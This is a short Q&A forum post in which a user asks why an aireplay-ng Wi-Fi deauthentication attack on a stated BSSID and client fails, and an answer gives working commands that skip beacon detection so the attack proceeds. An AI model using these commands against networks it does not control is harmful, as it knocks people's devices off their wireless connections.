# Problem regarding beacon frames and bssids

Tags: deauth-attack

I try to run a deauthentication attack:

```
aireplay-ng --deauth 100000 -a 06:CB:51:F8:6B:5F -c 64:89:F1:07:CC:4B wlan0
```

but it shows me this error:

```
15:19:28  Waiting for beacon frame (BSSID: 06:CB:51:F8:6B:5F) on channel 44
15:19:38  No such BSSID available.
```

what should I do? This bssid is valid and has like 5 of my household devices connected to it.

Answer (score 1):

try this:

```
ifconfig wlan0 down
aireplay-ng --deauth 100000 -a 06:CB:51:F8:6B:5F -c 64:89:F1:07:CC:4B -D wlan0
```

Disable wlan before attacking and disables AP detection. 
Some modes will not proceed if the AP beacon is not heard. This disables this functionality.[[1]](https://www.aircrack-ng.org/doku.php?id=aireplay-ng)